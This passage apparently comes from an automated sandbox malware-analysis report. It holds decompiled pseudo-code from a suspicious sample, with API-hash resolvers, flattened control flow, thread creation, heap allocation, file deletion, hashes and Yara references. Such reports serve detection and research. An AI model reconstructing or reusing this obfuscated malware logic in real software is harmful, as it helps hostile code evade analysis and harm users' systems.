					L2:
					if(_t82 == 0) {
						_t25 =  *0x227de58;
						if(_t25 == 0) {
							_t25 = E02273E80(_t45, E02273F20(0xbb398380), 0xb1aefb5, _t80);
							 *0x227de58 = _t25;
						}
						 *_t25(0,  &_v520, 0x104);
						_t27 =  *0x227dc3c;
						if(_t27 == 0) {
							_t27 = E02273E80(_t45, E02273F20(0x7539f5a2), 0x3f129d89, _t80);
							 *0x227dc3c = _t27;
						}
						 *((short*)( *_t27( &_v532))) = 0;
						_t11 = 0x32a2459b;
						continue;
					} else {
						if(_t11 == 0x3932e9b) {
							_t31 =  *0x227e2f0; // 0x4c2de8
							_v528 =  *(_t31 + 0x3c);
							_t33 =  *0x227db04;
							_v524 = _t79;
							if(_t33 == 0) {
								_t33 = E02273E80(_t45, E02273F20(0xbb398380), 0x7436592b, _t80);
								 *0x227db04 = _t33;
							}
							_push(0xffffffff);
							_push(0);
							_push( &_v528);
							_push(2);
							if( *_t33() == 0) {
								L37:
								return 0;
							} else {
								_t11 =  ==  ? 0x18584b48 : 0x3932e9b;
								continue;
							}
						} else {
							if(_t11 == 0x18584b48) {
								if(E02279C10(_t80) == 0) {
									_t38 =  *0x227dcdc; // 0x0
									if(_t38 == 0) {
										_t38 = E02273E80(_t45, E02273F20(0xbb398380), 0xcaaeebbc, _t80);
										 *0x227dcdc = _t38;
									}
									 *_t38(_t79);
									L14:
									_t11 = 0x3932e9b;
								} else {
									_t59 =  *0x227dff4; // 0x0
									if(_t59 == 0) {
										_t59 = E02273E80(_t45, E02273F20(0xbb398380), 0x1186b083, _t80);
										 *0x227dff4 = _t59;
									}
									_t41 =  *0x227e2f0; // 0x4c2de8
									 *_t59( *((intOrPtr*)(_t41 + 0x3c)));
									_t11 = 0x2713957b;
								}
								continue;
							} else {
								if(_t11 == 0x1e395e13) {
									_t11 = 0x1f18c325;
									continue;
									do {
										while(1) {
											_t82 = _t11 - 0x1f18c325;
											if(_t82 > 0) {
												goto L24;
											}
											goto L2;
										}
										goto L24;
									} while (_t11 != 0x2707225a);
									return 0;
								}
							}
						}
					}
					L38:
					L24:
					if(_t11 == 0x2713957b) {
						_t12 =  *0x227df90; // 0x0
						if(_t12 == 0) {
							_t12 = E02273E80(_t45, E02273F20(0xbb398380), 0x5f1f4281, _t80);
							 *0x227df90 = _t12;
						}
						 *_t12(_t79);
						goto L37;
					} else {
						if(_t11 != 0x32a2459b) {
							goto L32;
						} else {
							if( *0x227dca8 == 0) {
								 *0x227dca8 = E02273E80(_t45, E02273F20(0xbb398380), 0x39bd4dfe, _t80);
							}
							_t18 = FindFirstChangeNotificationW( &_v520, 0, 1); // executed
							_t79 = _t18;
							if(E02279C10(_t80) == 0) {
								goto L14;
							} else {
								_t20 =  *0x227dff4; // 0x0
								if(_t20 == 0) {
									_t20 = E02273E80(_t45, E02273F20(0xbb398380), 0x1186b083, _t80);
									 *0x227dff4 = _t20;
								}
								_t63 =  *0x227e2f0; // 0x4c2de8
								 *_t20( *((intOrPtr*)(_t63 + 0x3c)));
								_t11 = 0x2713957b;
							}
							continue;
						}
					}
					goto L38;
				}
			}

0x022799a7
0x022799ab
0x022799c0
0x022799c0
0x022799c5
0x00000000
0x00000000
0x022799cb
0x022799cb
0x02279ac3
0x02279aca
0x02279add
0x02279ae2
0x02279ae2
0x02279af3
0x02279af5
0x02279afc
0x02279b0f
0x02279b14
0x02279b14
0x02279b22
0x02279b25
0x00000000
0x022799d1
0x022799d6
0x02279a68
0x02279a70
0x02279a74
0x02279a79
0x02279a7f
0x02279a92
0x02279a97
0x02279a97
0x02279a9c
0x02279a9e
0x02279aa4
0x02279aa5
0x02279aad
0x02279bf8
0x02279c01
0x02279ab3
0x02279abb
0x00000000
0x02279abb
0x022799dc
0x022799e1
0x022799fc
0x02279a37
0x02279a3e
0x02279a51
0x02279a56
0x02279a56
0x02279a5c
0x02279a5e
0x02279a5e
0x022799fe
0x022799fe
0x02279a06
0x02279a1e
0x02279a20
0x02279a20
0x02279a26
0x02279a2e
0x02279a30
0x02279a30
0x00000000
0x022799e3
0x022799e8
0x022799ee
0x022799f3
0x022799c0
0x022799c0
0x022799c0
0x022799c5
0x00000000
0x00000000
0x00000000
0x022799c5
0x00000000
0x022799c0
0x02279bcd
0x02279bcd
0x022799e8
0x022799e1
0x022799d6
0x00000000
0x02279b2f
0x02279b34
0x02279bd0
0x02279bd7
0x02279bea
0x02279bef
0x02279bef
0x02279bf5
0x00000000
0x02279b3a
0x02279b3f
0x00000000
0x02279b41
0x02279b48
0x02279b60
0x02279b60
0x02279b6e
0x02279b70
0x02279b79
0x00000000
0x02279b7f
0x02279b7f
0x02279b86
0x02279b99
0x02279b9e
0x02279b9e
0x02279ba3
0x02279bac
0x02279bae
0x02279bae
0x00000000
0x02279b79
0x02279b3f
0x00000000
0x02279b34

APIs

FindFirstChangeNotificationW.KERNELBASE(?,00000000,00000001), ref: 02279B6E

Strings

+Y6t, xrefs: 02279A8B
-L, xrefs: 02279A26, 02279A68, 02279BA3

Memory Dump Source

Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true

Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2270000_sort.jbxd

Yara matches

Similarity

API ID: ChangeFindFirstNotification
String ID: +Y6t$-L
API String ID: 1065410024-808303179
Opcode ID: 90a2904bc069aaf95eb322deaff9bc82051c9507bf97ea9378c96807fd1f188b
Instruction ID: c77e2df2d531fbca7a4ee7924a64244cacccdb5c9d3c0ce127b3115ec0f8d9df
Opcode Fuzzy Hash: 90a2904bc069aaf95eb322deaff9bc82051c9507bf97ea9378c96807fd1f188b
Instruction Fuzzy Hash: C6516370B2D3029BDB24EAF5A89466F32A76F85344B10585DF441CB288EF74C954CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00426474, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00426474(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
				signed short _t13;
				void* _t16;
				intOrPtr _t18;
				void* _t20;
				intOrPtr _t29;

				_t13 = SetErrorMode(0); // executed
				SetErrorMode(_t13 | 0x00008001); // executed
				_t16 = E00424BFB();
				_t29 = _a4;
				 *((intOrPtr*)(_t16 + 8)) = _t29;
				 *((intOrPtr*)(_t16 + 0xc)) = _t29;
				_t18 =  *((intOrPtr*)(E00424BFB() + 4));
				_t31 = _t18;
				if(_t18 != 0) {
					 *((intOrPtr*)(_t18 + 0x68)) = _t29;
					 *((intOrPtr*)(_t18 + 0x6c)) = _a8;
					 *((intOrPtr*)(_t18 + 0x70)) = _a12;
					_t10 =  &_a16; // 0x406468
					 *((intOrPtr*)(_t18 + 0x74)) =  *_t10;
					E004264D7(_t18, _t31);
				}
				if( *((char*)(E00424BFB() + 0x14)) == 0) {
					E00412710();
				}
				_t20 = 1;
				return _t20;
			}

APIs

SetErrorMode.KERNELBASE(00000000,00000000,0041845B,00000000,00000000,00000000,00000000,?,00000000,?,0040ECAE,00000000,00000000,00000000,00000000,00406468), ref: 0042647D
SetErrorMode.KERNELBASE(00000000,?,00000000,?,0040ECAE,00000000,00000000,00000000,00000000,00406468,00000000), ref: 00426484

Part of subcall function 004264D7: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00426508
Part of subcall function 004264D7: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 004265A9
Part of subcall function 004264D7: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 004265D6

Strings

hd@, xrefs: 004264B2

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: ErrorMode$FileModuleNamelstrcatlstrcpy
String ID: hd@
API String ID: 3389432936-3469257913
Opcode ID: cd2bf83e0aada7a78a64cd33e34dd8ad1fec100a5d14c2182ee5260116b148ae
Instruction ID: 56c02cd2a0ca812c609797d7f3c2b0aa536ab85d6a731917afc158bbbb4402dc
Opcode Fuzzy Hash: cd2bf83e0aada7a78a64cd33e34dd8ad1fec100a5d14c2182ee5260116b148ae
Instruction Fuzzy Hash: F2F04F71A043205FD714FF25E484B0A7BD4AF44714F06844FF4889B3A2CBB8E841CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0222002D, Relevance: 4.9, APIs: 3, Instructions: 387
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,02220005), ref: 022200E9
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,02220005), ref: 02220111

Memory Dump Source

Source File: 00000001.00000002.931629655.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2220000_sort.jbxd

Yara matches

Similarity

API ID: AllocInfoNativeSystemVirtual
String ID:
API String ID: 2032221330-0
Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
Instruction ID: e241159be38bf5143375c73197749071cdf282d31060fffc00978ade5ab58021
Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
Instruction Fuzzy Hash: 4BD11671A14327AFD714CF99C88076AB7E0FFA4308F04852DE885CB245E776EA49CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02271E60, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 108
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E02271E60(void* __ecx, void** __edx) {
				void* _v48;
				void* _v64;
				void* _v72;
				void* __ebx;
				void* __ebp;
				void* _t14;
				intOrPtr* _t16;
				intOrPtr* _t23;
				void* _t26;
				void* _t32;
				void _t33;
				void* _t34;
				void* _t45;
				void* _t46;
				void** _t47;
				intOrPtr _t48;
				long _t49;
				void* _t52;

				_t34 = __ecx;
				_t45 = _v48;
				_t47 = __edx;
				_v64 = __ecx;
				_t14 = 0x117d008;
				goto L1;
				do {
					while(1) {
						L1:
						_t52 = _t14 - 0x2db2facf;
						if(_t52 > 0) {
							break;
						}
						if(_t52 == 0) {
							_t47[1] = E02271E20(_t34);
							_t14 = 0x379eeb54;
							continue;
						} else {
							if(_t14 == 0x117d008) {
								 *_t47 = 0;
								_t14 = 0x2db2facf;
								_t47[1] = 0;
								continue;
							} else {
								if(_t14 == 0x69f96d4) {
									_t45 =  *_t47;
									_t14 = 0x9c0f05c;
									continue;
								} else {
									if(_t14 != 0x9c0f05c) {
										goto L18;
									} else {
										 *_t45 =  *_t34;
										_t45 = _t45 + 4;
										_t14 = 0x2e2468af;
										continue;
									}
								}
							}
						}
						L24:
					}
					if(_t14 == 0x2e2468af) {
						 *_t45 =  *(_t34 + 8);
						_t46 = _t45 + 4;
						_t16 =  *0x227daac;
						_t33 =  *(_t34 + 8);
						_t48 =  *((intOrPtr*)(_t34 + 4));
						if(_t16 == 0) {
							_t16 = E02273E80(_t33, E02273F20(0xe66945e6), 0x70f7b8ec, _t48);
							 *0x227daac = _t16;
						}
						 *_t16(_t46, _t48, _t33);
						goto L23;
					} else {
						if(_t14 != 0x379eeb54) {
							goto L18;
						} else {
							_t23 =  *0x227dea8;
							_t49 = _t47[1];
							if(_t23 == 0) {
								_t23 = E02273E80(_t32, E02273F20(0xbb398380), 0x97f883e, _t49);
								 *0x227dea8 = _t23;
							}
							_t32 =  *_t23();
							if( *0x227dcec == 0) {
								 *0x227dcec = E02273E80(_t32, E02273F20(0xbb398380), 0xe9233692, _t49);
							}
							_t26 = RtlAllocateHeap(_t32, 8, _t49); // executed
							 *_t47 = _t26;
							if(_t26 == 0) {
								L23:
								return 0 |  *_t47 != 0x00000000;
							} else {
								_t34 = _v72;
								_t14 = 0x69f96d4;
								goto L1;
							}
						}
					}
					goto L24;
					L18:
				} while (_t14 != 0x31001f6f);
				return 0 |  *_t47 != 0x00000000;
				goto L24;
			}

0x02271e60
0x02271e67
0x02271e6b
0x02271e6d
0x02271e71
0x02271e71
0x02271e76
0x02271e76
0x02271e76
0x02271e76
0x02271e7b
0x00000000
0x00000000
0x02271e7d
0x02271ec8
0x02271ecb
0x00000000
0x02271e7f
0x02271e84
0x02271eaf
0x02271eb5
0x02271eba
0x00000000
0x02271e86
0x02271e8b
0x02271ea6
0x02271ea8
0x00000000
0x02271e8d
0x02271e92
0x00000000
0x02271e98
0x02271e9a
0x02271e9c
0x02271e9f
0x00000000
0x02271e9f
0x02271e92
0x02271e8b
0x02271e84
0x00000000
0x02271e7d
0x02271ed7
0x02271f6a
0x02271f6c
0x02271f6f
0x02271f74
0x02271f77
0x02271f7c
0x02271f8f
0x02271f94
0x02271f94
0x02271f9c
0x00000000
0x02271edd
0x02271ee2
0x00000000
0x02271ee4
0x02271ee4
0x02271ee9
0x02271eee
0x02271f01
0x02271f06
0x02271f06
0x02271f0d
0x02271f16
0x02271f2e
0x02271f2e
0x02271f37
0x02271f39
0x02271f3d
0x02271fa1
0x02271faf
0x02271f3f
0x02271f3f
0x02271f43
0x00000000
0x02271f43
0x02271f3d
0x02271ee2
0x00000000
0x02271f4d
0x02271f4d
0x02271f66
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,?,?,?,?,?,?,?,?,?,?,?,?,0227185E,?), ref: 02271F37

Strings

Ei, xrefs: 02271F7E

Memory Dump Source

Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true

Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2270000_sort.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: Ei
API String ID: 1279760036-3988083245
Opcode ID: 5931c6eb5dfd71931cb1a59ce44140df3a7b9f512d8b0fe5ab8bc136a9cc8c72
Instruction ID: a7ee9aa201fc0c5544596ef23a23246a18871935c6333da773998b299e495b25
Opcode Fuzzy Hash: 5931c6eb5dfd71931cb1a59ce44140df3a7b9f512d8b0fe5ab8bc136a9cc8c72
Instruction Fuzzy Hash: 2D31D871B2C302DBE720DBF5A48422673E5FF94254B14882AE94EC7344DB75DC658B83

Uniqueness

Uniqueness Score: -1.00%

Function 02279D70, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88
threadCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02279D70(void* __ebx) {
				void* _t7;
				intOrPtr* _t8;
				intOrPtr* _t10;
				intOrPtr* _t16;
				intOrPtr _t17;
				void* _t20;
				void* _t25;
				intOrPtr _t27;
				void* _t40;
				void* _t41;

				_t25 = __ebx;
				_t7 = 0x94e9677;
				L1:
				while(_t7 != 0x94e9677) {
					if(_t7 == 0x11e89e6c) {
						_t16 =  *0x227dc9c;
						if(_t16 == 0) {
							_t16 = E02273E80(_t25, E02273F20(0xbb398380), 0x2a635a2, _t41);
							 *0x227dc9c = _t16;
						}
						_t17 =  *_t16(0, 0, 0, 0);
						_t27 =  *0x227e2f0; // 0x4c2de8
						 *((intOrPtr*)(_t27 + 0x3c)) = _t17;
						_t7 = 0x31494004;
						continue;
					} else {
						if(_t7 == 0x31494004) {
							if( *0x227de90 == 0) {
								 *0x227de90 = E02273E80(_t25, E02273F20(0xbb398380), 0x70a5bbfd, _t41);
							}
							_t20 = CreateThread(0, 0, E022799A0, 0, 0, 0);
							_t27 =  *0x227e2f0; // 0x4c2de8
							 *(_t27 + 0x34) = _t20;
							L18:
							return 0 | _t27 != 0x00000000;
						} else {
							if(_t7 != 0xf4b9f58) {
								continue;
							} else {
								return 0 | _t27 != 0x00000000;
							}
						}
					}
					L19:
				}
				_t8 =  *0x227dea8;
				if(_t8 == 0) {
					_t8 = E02273E80(_t25, E02273F20(0xbb398380), 0x97f883e, _t41);
					 *0x227dea8 = _t8;
				}
				_t40 =  *_t8();
				_t10 =  *0x227dcec;
				if(_t10 == 0) {
					_t10 = E02273E80(_t25, E02273F20(0xbb398380), 0xe9233692, _t41);
					 *0x227dcec = _t10;
				}
				_t27 =  *_t10(_t40, 8, 0x40);
				 *0x227e2f0 = _t27;
				if(_t27 == 0) {
					goto L18;
				} else {
					_t7 = 0x11e89e6c;
					goto L1;
				}
				goto L19;
			}

0x02279d70
0x02279d76
0x00000000
0x02279d80
0x02279d8c
0x02279da9
0x02279db0
0x02279dc3
0x02279dc8
0x02279dc8
0x02279dd5
0x02279dd7
0x02279ddd
0x02279de0
0x00000000
0x02279d8e
0x02279d93
0x02279e57
0x02279e6f
0x02279e6f
0x02279e83
0x02279e85
0x02279e8b
0x02279e8e
0x02279e96
0x02279d99
0x02279d9e
0x00000000
0x02279da0
0x02279da8
0x02279da8
0x02279d9e
0x02279d93
0x00000000
0x02279d8c
0x02279de7
0x02279dee
0x02279e01
0x02279e06
0x02279e06
0x02279e0d
0x02279e0f
0x02279e16
0x02279e29
0x02279e2e
0x02279e2e
0x02279e3a
0x02279e3c
0x02279e44
0x00000000
0x02279e46
0x02279e46
0x00000000
0x02279e46
0x00000000

APIs

CreateThread.KERNELBASE(00000000,00000000,022799A0,00000000,00000000,00000000), ref: 02279E83

Strings

-L, xrefs: 02279D70, 02279DD7, 02279E3C, 02279E85

Memory Dump Source

Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true

Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2270000_sort.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: -L
API String ID: 2422867632-3144795080
Opcode ID: e43a5aa82b583a21e02e9dc24b23373092d3ea548ac68287cf370c502ff5a542
Instruction ID: e22ca1993f26ecb34d977efe8de8a414d7f72558ceb71ca90ca7e49c80a96464
Opcode Fuzzy Hash: e43a5aa82b583a21e02e9dc24b23373092d3ea548ac68287cf370c502ff5a542
Instruction Fuzzy Hash: 9B217630B6D3026BDB54EAF5A956B6A22D2BF80644F14485DF506CB3C8EB70DC508BC6

Uniqueness

Uniqueness Score: -1.00%

Function 02275360, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E02275360(void* __ebx, void* __ebp) {
				signed char _v2;
				signed int _v276;
				signed int _v280;
				char _v284;
				signed short _v320;
				void* _t8;
				intOrPtr* _t16;
				intOrPtr* _t19;
				void* _t22;
				void* _t31;
				void* _t32;
				void* _t35;

				_t32 = __ebp;
				_t22 = __ebx;
				_t8 = 0x26a841ee;
				_t31 = 0;
				goto L1;
				do {
					while(1) {
						L1:
						_t35 = _t8 - 0x1fae9e92;
						if(_t35 > 0) {
							break;
						}
						if(_t35 == 0) {
							_t31 = _t31 + _v280 * 0x3e8;
							_t8 = 0x2e629178;
							continue;
						} else {
							if(_t8 == 0x41b9e46) {
								return (_v320 & 0x0000ffff) + _t31;
							} else {
								if(_t8 == 0xb2cdcb1) {
									_t16 =  *0x227db30;
									if(_t16 == 0) {
										_t16 = E02273E80(_t22, E02273F20(0xbb398380), 0xa4407471, _t32);
										 *0x227db30 = _t16;
									}
									 *_t16( &_v320); // executed
									_t8 = 0x22049820;
									continue;
								} else {
									if(_t8 != 0x142f3962) {
										goto L17;
									} else {
										_t19 =  *0x227dedc;
										_v284 = 0x11c;
										if(_t19 == 0) {
											_t19 = E02273E80(_t22, E02273F20(0xe66945e6), 0x69e48357, _t32);
											 *0x227dedc = _t19;
										}
										 *_t19( &_v284);
										_t8 = 0xb2cdcb1;
										continue;
									}
								}
							}
						}
						L22:
					}
					if(_t8 == 0x22049820) {
						_t31 = _t31 + (_v2 & 0x000000ff) * 0x186a0;
						_t8 = 0x1fae9e92;
						goto L1;
					} else {
						if(_t8 == 0x26a841ee) {
							_t8 = 0x142f3962;
							goto L1;
						} else {
							if(_t8 != 0x2e629178) {
								goto L17;
							} else {
								_t31 = _t31 + _v276 * 0x64;
								_t8 = 0x41b9e46;
								goto L1;
							}
						}
					}
					goto L22;
					L17:
				} while (_t8 != 0x135ed498);
				return _t31;
				goto L22;
			}

0x02275360
0x02275360
0x02275366
0x0227536c
0x0227536c
0x02275370
0x02275370
0x02275370
0x02275370
0x02275375
0x00000000
0x00000000
0x0227537b
0x02275415
0x02275417
0x00000000
0x02275381
0x02275386
0x0227548e
0x0227538c
0x02275391
0x022753d8
0x022753df
0x022753f2
0x022753f7
0x022753f7
0x02275401
0x02275403
0x00000000
0x02275393
0x02275398
0x00000000
0x0227539e
0x0227539e
0x022753a3
0x022753ad
0x022753c0
0x022753c5
0x022753c5
0x022753cf
0x022753d1
0x00000000
0x022753d1
0x02275398
0x02275391
0x02275386
0x00000000
0x0227537b
0x02275426
0x02275474
0x02275476
0x00000000
0x02275428
0x0227542d
0x0227545c
0x00000000
0x0227542f
0x02275434
0x00000000
0x02275436
0x0227543b
0x0227543d
0x00000000
0x0227543d
0x02275434
0x0227542d
0x00000000
0x02275447
0x02275447
0x0227545b
0x00000000

APIs

GetNativeSystemInfo.KERNELBASE(2564BE4F,2564BE4F), ref: 02275401

Strings

Ei, xrefs: 022753AF

Memory Dump Source

Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true

Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2270000_sort.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: Ei
API String ID: 1721193555-3988083245
Opcode ID: 6c2ffe6665a8a43180662e94d05953cf7e3e5c7e3e8c52f0b54fa07d09c14e46
Instruction ID: 97ca45d9cca7c7bc6ac67d93e4acc15950684d8749697e035875f368ed12aaf5
Opcode Fuzzy Hash: 6c2ffe6665a8a43180662e94d05953cf7e3e5c7e3e8c52f0b54fa07d09c14e46
Instruction Fuzzy Hash: CF21FD61E3C35147C6249BE998D42BFE5D15B54284FC40D3AEC49DF268DB74C9609BC3

Uniqueness

Uniqueness Score: -1.00%

Function 02277DD0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
fileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E02277DD0(void* __ebx, void* __edi, void* __esi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v520;
				intOrPtr* _t5;
				intOrPtr* _t7;
				intOrPtr* _t9;
				void* _t38;
				void* _t41;
				void* _t44;
				WCHAR* _t45;

				_t43 = __ebp;
				_t19 = __ebx;
				_t44 =  &_v520;
				_t41 = E022734C0(0x227d940);
				_t5 =  *0x227dc60;
				if(_t5 == 0) {
					_t5 = E02273E80(__ebx, E02273F20(0xe66945e6), 0xcca28b0d, __ebp);
					 *0x227dc60 = _t5;
				}
				 *_t5( &_v520, 0x104, _t41, _a8, _a4 + 0x2c);
				_t7 =  *0x227dea8;
				_t45 = _t44 + 0x14;
				if(_t7 == 0) {
					_t7 = E02273E80(_t19, E02273F20(0xbb398380), 0x97f883e, _t43);
					 *0x227dea8 = _t7;
				}
				_t38 =  *_t7();
				_t9 =  *0x227e1a0;
				if(_t9 == 0) {
					_t9 = E02273E80(_t19, E02273F20(0xbb398380), 0x26c3f343, _t43);
					 *0x227e1a0 = _t9;
				}
				 *_t9(_t38, 0, _t41);
				if( *0x227df94 == 0) {
					 *0x227df94 = E02273E80(_t19, E02273F20(0xbb398380), 0x86a49eb, _t43);
				}
				DeleteFileW(_t45); // executed
				return 1;
			}

0x02277dd0
0x02277dd0
0x02277dd0
0x02277de2
0x02277de4
0x02277deb
0x02277dfe
0x02277e03
0x02277e03
0x02277e25
0x02277e27
0x02277e2c
0x02277e31
0x02277e44
0x02277e49
0x02277e49
0x02277e50
0x02277e52
0x02277e59
0x02277e6c
0x02277e71
0x02277e71
0x02277e7a
0x02277e85
0x02277e9d
0x02277e9d
0x02277ea6
0x02277eb3

APIs

DeleteFileW.KERNELBASE ref: 02277EA6

Strings

Ei, xrefs: 02277DED

Memory Dump Source

Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true

Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2270000_sort.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: Ei
API String ID: 4033686569-3988083245
Opcode ID: 6febd6c75edcf64da5ccb8193dabd97708ab423e583a66521245bbd25caf0ea2
Instruction ID: cd62b57a96eb8fc8921ceeb9c058d46f875eb6e5a25571dc09c44652afd85561
Opcode Fuzzy Hash: 6febd6c75edcf64da5ccb8193dabd97708ab423e583a66521245bbd25caf0ea2
Instruction Fuzzy Hash: DA117F71B29201ABD714F7F4A89977B3696AFC4284F00086CE449DB248EF308C149BA2

Uniqueness

Uniqueness Score: -1.00%

Function 02275BC0, Relevance: 3.1, APIs: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E02275BC0(void* __ecx, void* __edx, void* __ebp) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* __ebx;
				intOrPtr* _t3;
				void* _t6;
				intOrPtr* _t9;
				void* _t20;
				void* _t21;
				void* _t38;
				void* _t39;
				void* _t40;
				void* _t41;

				_t42 = __ebp;
				_t3 =  *0x227dea8;
				_t20 = __ecx;
				_t38 = __edx;
				if(_t3 == 0) {
					_t3 = E02273E80(_t20, E02273F20(0xbb398380), 0x97f883e, __ebp);
					 *0x227dea8 = _t3;
				}
				_t40 =  *_t3();
				if( *0x227dcec == 0) {
					 *0x227dcec = E02273E80(_t20, E02273F20(0xbb398380), 0xe9233692, _t42);
				}
				_t6 = RtlAllocateHeap(_t40, 8, 0x40000); // executed
				_t41 = _t6;
				if(_t41 == 0) {
					return 0;
				} else {
					_push(_t41);
					_push(_v0);
					_push(_v4);
					_t21 = E02275880(_t20, _t38);
					_t9 =  *0x227dea8;
					if(_t9 == 0) {
						_t9 = E02273E80(_t21, E02273F20(0xbb398380), 0x97f883e, _t42);
						 *0x227dea8 = _t9;
					}
					_t39 =  *_t9();
					if( *0x227e1a0 == 0) {
						 *0x227e1a0 = E02273E80(_t21, E02273F20(0xbb398380), 0x26c3f343, _t42);
					}
					RtlFreeHeap(_t39, 0, _t41); // executed
					return _t21;
				}
			}

0x02275bc0
0x02275bc0
0x02275bc6
0x02275bca
0x02275bce
0x02275be1
0x02275be6
0x02275be6
0x02275bed
0x02275bf6
0x02275c0e
0x02275c0e
0x02275c1b
0x02275c1d
0x02275c21
0x02275c97
0x02275c23
0x02275c23
0x02275c24
0x02275c2c
0x02275c35
0x02275c3a
0x02275c41
0x02275c54
0x02275c59
0x02275c59
0x02275c60
0x02275c69
0x02275c81
0x02275c81
0x02275c8a
0x02275c91
0x02275c91

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,00040000), ref: 02275C1B
RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 02275C8A

Memory Dump Source

Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true

Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2270000_sort.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFree
String ID:
API String ID: 2488874121-0
Opcode ID: 206ea653176cfd22e9493a3dd9330bf6280dc33cfc92d186af52047d19637b58
Instruction ID: 90b603347a0081c8c11dd2cd359e8a05b842601ec98475fbbe68a794ffdb2a87
Opcode Fuzzy Hash: 206ea653176cfd22e9493a3dd9330bf6280dc33cfc92d186af52047d19637b58
Instruction Fuzzy Hash: 2311AC72F192026BDB14AAF8689476B62D7AFC0294B44487CF805CB348EF708C255BD2

Uniqueness

Uniqueness Score: -1.00%

Function 00412710, Relevance: 3.0, APIs: 2, Instructions: 27
threadCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00412710() {
				void* _t6;
				void* _t7;
				struct HHOOK__* _t9;
				void* _t18;

				_t6 = E00424BFB();
				if( *((char*)(_t6 + 0x14)) == 0) {
					_t7 = E004249C4();
